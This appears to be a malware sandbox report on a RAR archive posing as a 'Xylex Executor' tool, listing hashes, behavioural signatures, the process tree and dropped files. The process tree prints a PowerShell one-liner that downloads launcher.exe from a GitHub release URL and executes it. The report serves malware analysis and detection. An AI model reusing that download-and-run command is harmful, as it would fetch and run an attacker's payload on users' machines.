Analysis
-
max time kernel
24s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
09/05/2024, 14:44
Behavioral task
behavioral1
Sample
Xylex_Executor_V1.2.rar
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
Xylex_Executor_V1.2.rar
Resource
win10v2004-20240426-en
General
-
Target
Xylex_Executor_V1.2.rar
-
Size
10.8MB
-
MD5
720cc843dc613c7e5266016adecafcc5
-
SHA1
aa62cd7fa0a407f35d14dbc94f79eedbde15450b
-
SHA256
b462fb0c6aa61e992f7777643f124ed7742a89c121df99929d3bcd8f3a92e28d
-
SHA512
ca757b7cb7089db7274dab30c90ee77c09a58a8d5817f3b6dff55154696876050b5075c55f1f3d8db625f86f8f0c5b73021336e83558d79d401090cfd1a34a85
-
SSDEEP
196608:QaV7QUcqKJtri2jrz7OLEVxHIRHXJ5OM2zXVNVAlbixK30ObibbDOix9phR:QfRD+LiuJ5OMANOlbCK3tCD7hR
Malware Config
Extracted
https://github.com/ptsd9/script/releases/download/launcher/launcher.exe
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 1656 powershell.exe 6 1656 powershell.exe 8 2844 powershell.exe 9 2844 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1588 launcher.exe 1344 launcher.exe -
Loads dropped DLL 4 IoCs
pid Process 2632 7zFM.exe 1588 launcher.exe 1344 launcher.exe 1196 Process not Found -
resource yara_rule behavioral1/files/0x0006000000016d16-125.dat upx behavioral1/memory/1344-127-0x000007FEEEDE0000-0x000007FEEF3C7000-memory.dmp upx -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0009000000014dae-72.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1656 powershell.exe 2632 7zFM.exe 2844 powershell.exe 2632 7zFM.exe 2632 7zFM.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2632 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeRestorePrivilege 2632 7zFM.exe Token: 35 2632 7zFM.exe Token: SeSecurityPrivilege 2632 7zFM.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeSecurityPrivilege 2632 7zFM.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeSecurityPrivilege 2632 7zFM.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2632 7zFM.exe 2632 7zFM.exe 2632 7zFM.exe 2632 7zFM.exe 2632 7zFM.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2028 wrote to memory of 2632 2028 cmd.exe 29 PID 2028 wrote to memory of 2632 2028 cmd.exe 29 PID 2028 wrote to memory of 2632 2028 cmd.exe 29 PID 2632 wrote to memory of 2752 2632 7zFM.exe 30 PID 2632 wrote to memory of 2752 2632 7zFM.exe 30 PID 2632 wrote to memory of 2752 2632 7zFM.exe 30 PID 2752 wrote to memory of 1656 2752 cmd.exe 32 PID 2752 wrote to memory of 1656 2752 cmd.exe 32 PID 2752 wrote to memory of 1656 2752 cmd.exe 32 PID 2632 wrote to memory of 2792 2632 7zFM.exe 33 PID 2632 wrote to memory of 2792 2632 7zFM.exe 33 PID 2632 wrote to memory of 2792 2632 7zFM.exe 33 PID 2792 wrote to memory of 2844 2792 cmd.exe 35 PID 2792 wrote to memory of 2844 2792 cmd.exe 35 PID 2792 wrote to memory of 2844 2792 cmd.exe 35 PID 2632 wrote to memory of 1588 2632 7zFM.exe 36 PID 2632 wrote to memory of 1588 2632 7zFM.exe 36 PID 2632 wrote to memory of 1588 2632 7zFM.exe 36 PID 1588 wrote to memory of 1344 1588 launcher.exe 37 PID 1588 wrote to memory of 1344 1588 launcher.exe 37 PID 1588 wrote to memory of 1344 1588 launcher.exe 37
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Xylex_Executor_V1.2.rar1⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Xylex_Executor_V1.2.rar"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7zO84A9B236\Xylex V1.2.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/ptsd9/script/releases/download/launcher/launcher.exe';$file='launcher.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7zO84AB1216\Xylex V1.2.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/ptsd9/script/releases/download/launcher/launcher.exe';$file='launcher.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO84AE5176\launcher.exe"C:\Users\Admin\AppData\Local\Temp\7zO84AE5176\launcher.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Users\Admin\AppData\Local\Temp\7zO84AE5176\launcher.exe"C:\Users\Admin\AppData\Local\Temp\7zO84AE5176\launcher.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1344
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
355B
MD56ef57091ddca52dc85c39d905f1e7abb
SHA1df53ab324b8ce2ed2dcf5d95fe34a3916e9442d1
SHA256ef724fbf241a2289f955746936ca9163808d393d0bd894e00f8463cede1ce00e
SHA512515519b4d58fede62f4dc34c3c933a6a559b81c3b755e604ec553c22b235a95f0fc22c32d75e06f1b42f3e2579b13c919e635be6394d3834ffb48ecc6bce7950
-
Filesize
1.6MB
MD5bd98d92c8c8b8c5983ef725a9bc953a9
SHA11ad5435b23116ad85a55a55754c42bb788c36388
SHA256e41f2d9e02e8498ec53f8286e86011c75e9da0f6b24b2d9979e6e5726ef28913
SHA51248fa76a57c12088d3e24b56e1ace114f028aac5ae383f7810b02dce2768820a7190fc1cc3fd4684a2f06e98c1ccc0641a3f1906e992d7a5736194989c072959e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD512e638d531b46c08e20f28eef34bd442
SHA1bfc15bde0b37080c00bd51763fd15668e94d49e7
SHA2567a90abd0168f8bbf61cf99a6d38b5b7b94c5389b1dcc1839dbf74e9ac0cb106a
SHA5123fb10fed3c503252860eee0b6d7e074df64d1d9506576961d29fd98aa647c9b1376c5b1ffb626031816403741b9fdcee1fcb07024048e41cfe0c3831cc2e4347
-
Filesize
10.9MB
MD515916166c043ce50f37b0a65f4c5d751
SHA11ef18a33a5c982514382aba053bee695281ca291
SHA25609ff479a5a9d03f909fd4832b51dbafab4758717624852e697edc8eea26c4086
SHA5121bac7ddd8dfd6b9debf75ea98025770db752889fac5b4b33c1a928097cc57f4f8662ee6173e88840ff9f08e325e2fff2238b6e18fa5b64e26ab9bfd1a7da439d